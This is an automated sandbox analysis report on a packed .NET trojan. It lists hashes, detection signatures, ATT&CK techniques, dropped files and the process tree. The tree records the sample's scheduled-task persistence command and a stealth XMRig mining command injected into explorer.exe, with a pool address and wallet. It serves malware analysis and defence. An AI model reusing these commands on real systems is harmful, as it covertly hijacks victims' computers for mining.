Analysis

  • max time kernel
    131s
  • max time network
    159s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    16-07-2021 15:40

General

  • Target

    SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe

  • Size

    2.1MB

  • MD5

    73ab4524d40fd3f991dd0b12646772e1

  • SHA1

    f1391279800f539282edaf04f636642d6569a7d8

  • SHA256

    d765cca6a80ac3e18801b578cb3eacae5a35c4c45b365e5d02d2c17a48fb23d6

  • SHA512

    4cb98b37d7ad25bc316d2f5fa64a3c59aa2f71365d0bcab471318646041558317bf85a5b2b0cddf1a6d52a4c268a519b37fa3560ae5d9d057cbc21501ec5226b

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1668
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services64System" /tr '"C:\Users\Admin\AppData\Roaming\Services64System.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1500
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "Services64System" /tr '"C:\Users\Admin\AppData\Roaming\Services64System.exe"'
        3⤵
        • Creates scheduled task(s)
        PID:656
    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      2⤵
      • Executes dropped EXE
      PID:864
    • C:\Users\Admin\AppData\Roaming\Services64System.exe
      "C:\Users\Admin\AppData\Roaming\Services64System.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1484
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services64System" /tr '"C:\Users\Admin\AppData\Roaming\Services64System.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:976
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "Services64System" /tr '"C:\Users\Admin\AppData\Roaming\Services64System.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:680
      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        3⤵
        • Executes dropped EXE
        PID:336
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.minexmr.com:4444 --user=45xUdHPiFHQ7xbKh19G45saF1raB2ot5pag8p1Hnk4yrfXRJZskr8TMbFpVfC5tDk8eQQg63TqkW9gKhwagx6HePTaK2yXb --pass= --cpu-max-threads-hint=0 --donate-level=5 --cinit-idle-wait=1 --cinit-idle-cpu=100 --cinit-stealth
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:912

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Discovery

System Information Discovery

1
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
    MD5

    0c0195c48b6b8582fa6f6373032118da

    SHA1

    d25340ae8e92a6d29f599fef426a2bc1b5217299

    SHA256

    11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

    SHA512

    ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    e5e9669aa667d6e2b8298fe086ec0026

    SHA1

    133e5cd7196fb848ed4139573c2b62b3cb243814

    SHA256

    82258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11

    SHA512

    86e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    e5e9669aa667d6e2b8298fe086ec0026

    SHA1

    133e5cd7196fb848ed4139573c2b62b3cb243814

    SHA256

    82258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11

    SHA512

    86e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    e5e9669aa667d6e2b8298fe086ec0026

    SHA1

    133e5cd7196fb848ed4139573c2b62b3cb243814

    SHA256

    82258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11

    SHA512

    86e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    e5e9669aa667d6e2b8298fe086ec0026

    SHA1

    133e5cd7196fb848ed4139573c2b62b3cb243814

    SHA256

    82258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11

    SHA512

    86e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97

  • C:\Users\Admin\AppData\Roaming\Services64System.exe
    MD5

    73ab4524d40fd3f991dd0b12646772e1

    SHA1

    f1391279800f539282edaf04f636642d6569a7d8

    SHA256

    d765cca6a80ac3e18801b578cb3eacae5a35c4c45b365e5d02d2c17a48fb23d6

    SHA512

    4cb98b37d7ad25bc316d2f5fa64a3c59aa2f71365d0bcab471318646041558317bf85a5b2b0cddf1a6d52a4c268a519b37fa3560ae5d9d057cbc21501ec5226b

  • C:\Users\Admin\AppData\Roaming\Services64System.exe
    MD5

    73ab4524d40fd3f991dd0b12646772e1

    SHA1

    f1391279800f539282edaf04f636642d6569a7d8

    SHA256

    d765cca6a80ac3e18801b578cb3eacae5a35c4c45b365e5d02d2c17a48fb23d6

    SHA512

    4cb98b37d7ad25bc316d2f5fa64a3c59aa2f71365d0bcab471318646041558317bf85a5b2b0cddf1a6d52a4c268a519b37fa3560ae5d9d057cbc21501ec5226b

  • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    e5e9669aa667d6e2b8298fe086ec0026

    SHA1

    133e5cd7196fb848ed4139573c2b62b3cb243814

    SHA256

    82258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11

    SHA512

    86e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97

  • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    e5e9669aa667d6e2b8298fe086ec0026

    SHA1

    133e5cd7196fb848ed4139573c2b62b3cb243814

    SHA256

    82258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11

    SHA512

    86e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97

  • \Users\Admin\AppData\Roaming\Services64System.exe
    MD5

    73ab4524d40fd3f991dd0b12646772e1

    SHA1

    f1391279800f539282edaf04f636642d6569a7d8

    SHA256

    d765cca6a80ac3e18801b578cb3eacae5a35c4c45b365e5d02d2c17a48fb23d6

    SHA512

    4cb98b37d7ad25bc316d2f5fa64a3c59aa2f71365d0bcab471318646041558317bf85a5b2b0cddf1a6d52a4c268a519b37fa3560ae5d9d057cbc21501ec5226b

  • memory/336-88-0x000000013FD40000-0x000000013FD41000-memory.dmp
    Filesize

    4KB

  • memory/336-84-0x0000000000000000-mapping.dmp
  • memory/336-100-0x000000001B410000-0x000000001B412000-memory.dmp
    Filesize

    8KB

  • memory/656-64-0x0000000000000000-mapping.dmp
  • memory/680-82-0x0000000000000000-mapping.dmp
  • memory/864-66-0x0000000000000000-mapping.dmp
  • memory/864-79-0x000000001BB10000-0x000000001BB12000-memory.dmp
    Filesize

    8KB

  • memory/864-77-0x0000000000760000-0x0000000000762000-memory.dmp
    Filesize

    8KB

  • memory/864-71-0x000000013F1E0000-0x000000013F1E1000-memory.dmp
    Filesize

    4KB

  • memory/912-94-0x0000000140000000-0x0000000140758000-memory.dmp
    Filesize

    7.3MB

  • memory/912-93-0x0000000000360000-0x0000000000380000-memory.dmp
    Filesize

    128KB

  • memory/912-95-0x00000000003F0000-0x0000000000410000-memory.dmp
    Filesize

    128KB

  • memory/912-96-0x00000000003D0000-0x00000000003F0000-memory.dmp
    Filesize

    128KB

  • memory/912-91-0x0000000140000000-0x0000000140758000-memory.dmp
    Filesize

    7.3MB

  • memory/912-98-0x00000000003F0000-0x0000000000410000-memory.dmp
    Filesize

    128KB

  • memory/912-97-0x00000000003D0000-0x00000000003F0000-memory.dmp
    Filesize

    128KB

  • memory/912-92-0x00000001402EB66C-mapping.dmp
  • memory/976-81-0x0000000000000000-mapping.dmp
  • memory/1484-90-0x00000000009F0000-0x00000000009FA000-memory.dmp
    Filesize

    40KB

  • memory/1484-80-0x000000001B4A0000-0x000000001B4A2000-memory.dmp
    Filesize

    8KB

  • memory/1484-75-0x000000013FBB0000-0x000000013FBB1000-memory.dmp
    Filesize

    4KB

  • memory/1484-70-0x0000000000000000-mapping.dmp
  • memory/1500-63-0x0000000000000000-mapping.dmp
  • memory/1668-59-0x000000013F860000-0x000000013F861000-memory.dmp
    Filesize

    4KB

  • memory/1668-61-0x000000001C430000-0x000000001C64C000-memory.dmp
    Filesize

    2.1MB

  • memory/1668-62-0x000000001BAF0000-0x000000001BAF2000-memory.dmp
    Filesize

    8KB